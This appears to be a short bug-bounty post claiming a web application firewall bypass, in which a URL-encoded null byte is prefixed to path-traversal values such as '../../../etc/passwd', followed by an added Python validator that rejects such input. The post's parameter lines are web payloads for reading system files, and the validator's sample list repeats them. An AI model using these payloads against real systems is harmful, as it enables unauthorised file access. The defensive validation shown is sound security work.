Just discovered a weird but 100% working #WAF #Bypass – When RFI/LFI are blocked
Doesn't work.
path=../../../etc/passwd
file=config.xml
Works.
path=%00../../../etc/passwd
file=%00config.xml
This works successfully. Quite a new direction for WAF bypassing. #bugbounty #Infosec
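
On the application side, this class of input can be rejected regardless of what the WAF matched. The following is an added example, not part of the original post: a parameter validator that percent-decodes the value, refuses NUL and other control characters, and confirms the resolved path stays under a base directory. `BASE_DIR` and all function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/app/files"  # hypothetical base directory (assumption)

def decode_fully(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def safe_path(raw_value, base_dir=BASE_DIR):
    """Return the resolved path under base_dir, or raise ValueError."""
    value = decode_fully(raw_value)
    # Reject NUL and other control characters outright; never strip them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in parameter")
    # Resolve '..' segments, then confirm the result stays inside base_dir.
    resolved = posixpath.normpath(posixpath.join(base_dir, value))
    if resolved != base_dir and not resolved.startswith(base_dir + "/"):
        raise ValueError("path escapes base directory")
    return resolved

def check(raw_value):
    """Return 'ok' or the rejection reason, for use on sample inputs."""
    try:
        safe_path(raw_value)
        return "ok"
    except ValueError as exc:
        return str(exc)

# Constructed samples: the four values quoted in the post plus a double-encoded one.
SAMPLES = ["../../../etc/passwd", "config.xml", "%00../../../etc/passwd",
           "%00config.xml", "%2500config.xml"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:32} -> {check(s)}")
```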